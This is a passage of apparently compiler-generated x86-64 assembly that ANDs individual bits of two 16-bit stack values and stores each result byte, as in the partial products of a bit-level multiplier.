killed $al killed $eax movb %al, -1100(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -783(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -782(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -378(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $5, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -896(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1144(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -898(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -245(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -249(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -247(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -253(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -899(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -893(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -944(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -894(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -762(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -763(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -764(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -765(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -205(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -886(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -546(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -543(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1121(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1020(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1021(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -491(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -482(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -584(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $5, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -154(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -152(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -151(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -158(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -157(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -156(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $5, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -510(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -303(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -302(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -301(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -300(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -299(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -298(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $5, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -677(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -675(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -676(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -667(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -668(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -993(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -992(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -994(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $5, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1140(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -829(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -830(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -831(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -832(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -825(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -826(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -827(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -828(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $5, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -952(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -954(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -953(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -956(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -955(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -806(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -957(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -758(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -943(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -623(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $5, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -407(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -409(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -408(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -403(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -402(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -405(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -404(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -415(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -414(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -621(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -622(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $5, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1008(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -111(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -110(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -113(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -112(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -107(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -106(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -109(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -108(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -103(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -102(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -911(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -917(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $5, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1118(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1116(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -446(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1108(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -632(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -631(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -630(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -629(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -636(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -635(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -634(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -633(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -861(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $5, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -153(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -920(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -525(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -524(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -527(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -526(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -521(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -520(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -523(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -522(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -517(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1061(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -239(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -164(%rbp) movzwl -4(%rbp), %eax sarl $4, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -165(%rbp) movzwl -4(%rbp), %eax sarl $3, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $5, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -160(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1194(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1202(%rbp) movzwl -2(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $4, %ecx andl $1, %ecx orl %ecx, %eax xorl $-1, %eax ## kill: def $al killed $al killed $eax movb %al, -857(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -855(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -854(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -853(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -852(%rbp) movzwl -4(%rbp), %eax sarl $8, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -866(%rbp) movzwl -4(%rbp), %eax sarl $7, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $13, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -865(%rbp) movzwl -4(%rbp), %eax sarl $5, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $3, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -162(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $14, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -516(%rbp) movzwl -4(%rbp), %eax sarl $6, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $15, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -416(%rbp) movzwl -4(%rbp), %eax sarl $13, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $8, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -876(%rbp) movzwl -4(%rbp), %eax sarl $14, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $7, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -884(%rbp) movzwl -4(%rbp), %eax sarl $15, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $6, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -490(%rbp) movzwl -4(%rbp), %eax sarl $12, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $9, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1222(%rbp) movzwl -4(%rbp), %eax sarl $11, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $10, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1217(%rbp) movzwl -4(%rbp), %eax sarl $10, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $11, %ecx andl $1, %ecx andl %ecx, %eax ## kill: def $al killed $al killed $eax movb %al, -1216(%rbp) movzwl -4(%rbp), %eax sarl $9, %eax andl $1, %eax movzwl -2(%rbp), %ecx sarl $12, %ecx andl $1, %ecx andl %ecx, %eax 